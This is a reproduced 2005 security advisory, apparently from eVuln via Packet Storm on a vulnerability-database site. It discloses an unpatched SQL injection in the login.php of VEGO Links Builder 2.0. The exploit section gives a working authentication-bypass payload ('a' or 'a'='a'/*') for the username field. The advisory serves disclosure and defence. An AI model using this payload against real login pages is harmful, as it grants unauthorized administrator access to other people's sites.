Lucene search

EV0002.txt

🗓️ 04 Jan 2006 00:00:00Reported by Aliaksandr HartsuyeuType

packetstorm🔗 packetstormsecurity.com👁 20 Views

New eVuln Advisory for VEGO Links Builder 2.0: Authentication Bypass via SQL Injectio

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`New eVuln Advisory:  
VEGO Links Builder Authentication Bypass  
  
--------------------Summary----------------  
Vendor: VEGO  
Software: VEGO Links Builder  
Versions: 2.0  
Critical Level: Moderate  
Type: SQL Injection  
Class: Remote  
Status: Unpatched  
Exploit: Available  
Solution: Not Available  
Discovered by: Aliaksandr Hartsuyeu ([email protected])  
Published: 2005.12.29  
eVuln ID: EV0002  
  
-----------------Description--------------  
Vulnerable scripts:  
login.php  
  
Variable $username isn't properly sanitized before being used in a SQL query. This can be used to enter administrator area without password.  
  
Conditions: magic_quotes_gpc = off  
  
--------------Exploit---------------------  
Link:  
http://host/links/login.php  
  
username: a' or 'a'='a'/*  
password: anypassword  
  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit---------------------  
Original Advisory:  
http://evuln.com/vulns/2/summary.html  
  
Discovered by: Aliaksandr Hartsuyeu ([email protected])  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

04 Jan 2006 00:00Current

7.4High risk

Vulners AI Score7.4